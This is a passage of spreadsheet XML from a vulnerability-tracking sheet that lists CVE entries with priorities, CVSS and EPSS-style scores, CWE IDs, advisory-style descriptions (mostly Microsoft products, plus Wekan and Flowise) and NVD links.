          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="C838" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E838" s="5" t="inlineStr"/>
      <c r="F838" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L838" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="C839" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E839" s="5" t="inlineStr"/>
      <c r="F839" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L839" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="C840" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E840" s="5" t="inlineStr"/>
      <c r="F840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L840" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="C841" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E841" s="5" t="inlineStr"/>
      <c r="F841" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="inlineStr"/>
      <c r="I841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L841" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="C842" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E842" s="5" t="inlineStr"/>
      <c r="F842" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="inlineStr"/>
      <c r="I842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L842" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="C843" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E843" s="5" t="inlineStr"/>
      <c r="F843" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L843" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="C844" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E844" s="5" t="inlineStr"/>
      <c r="F844" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L844" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="C845" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E845" s="5" t="inlineStr"/>
      <c r="F845" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L845" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="C846" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E846" s="5" t="inlineStr"/>
      <c r="F846" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L846" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68561</t>
        </is>
      </c>
      <c r="C847" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E847" s="5" t="inlineStr"/>
      <c r="F847" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L847" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.89, the second Boards.allow({ update }) rule in server/permissions/boards.js called canUpdateBoardSort in server/lib/utils.js, which authorized any board member whenever fieldNames included sort. Because Meteor combines allow rules with OR semantics and applies the complete modifier, a comment-only or read-only member could send one Boards.update with $set values for sort, members, permission, and title, make themselves the sole board administrator, expose a private board, and evict the legitimate owner; the last-admin deny rule inspected only $pull and did not block a wholesale $set of members. Version 9.89 requires sort to be the only modified field and rejects $set member arrays that remove the last active administrator. This issue is fixed in version 9.89.</t>
        </is>
      </c>
      <c r="M847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68561</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="C848" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E848" s="5" t="inlineStr"/>
      <c r="F848" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L848" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="C849" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E849" s="5" t="inlineStr"/>
      <c r="F849" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L849" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68828</t>
        </is>
      </c>
      <c r="C850" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E850" s="5" t="inlineStr"/>
      <c r="F850" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L850" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69258</t>
        </is>
      </c>
      <c r="C851" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E851" s="5" t="inlineStr"/>
      <c r="F851" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="L851" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the unauthenticated POST /api/v1/prediction/:id endpoint accepted an overrideConfig object and unconditionally spread it into internal flowConfig and flowData objects in packages/server/src/utils/buildChatflow.ts and packages/server/src/utils/index.ts without checking apiOverrideStatus. This allowed unauthenticated attackers to inject arbitrary properties into the flow execution context of any public chatflow, overwrite values such as chatId, sessionId, and chatHistory, and control values resolved through $flow.* template variables consumed by flow nodes. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69258</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="C852" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E852" s="5" t="inlineStr"/>
      <c r="F852" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G852" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H852" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L852" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="C853" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E853" s="5" t="inlineStr"/>
      <c r="F853" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G853" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H853" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L853" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="C854" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E854" s="5" t="inlineStr"/>
      <c r="F854" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G854" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H854" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L854" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="C855" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E855" s="5" t="inlineStr"/>
      <c r="F855" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G855" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H855" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="C856" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E856" s="5" t="inlineStr"/>
      <c r="F856" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G856" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H856" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L856" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="C857" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E857" s="5" t="inlineStr"/>
      <c r="F857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G857" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L857" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="C858" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E858" s="5" t="inlineStr"/>
      <c r="F858" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G858" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L858" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="C859" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E859" s="5" t="inlineStr"/>
      <c r="F859" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G859" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L859" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="C860" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E860" s="5" t="inlineStr"/>
      <c r="F860" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G860" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L860" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="C861" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G861" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L861" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
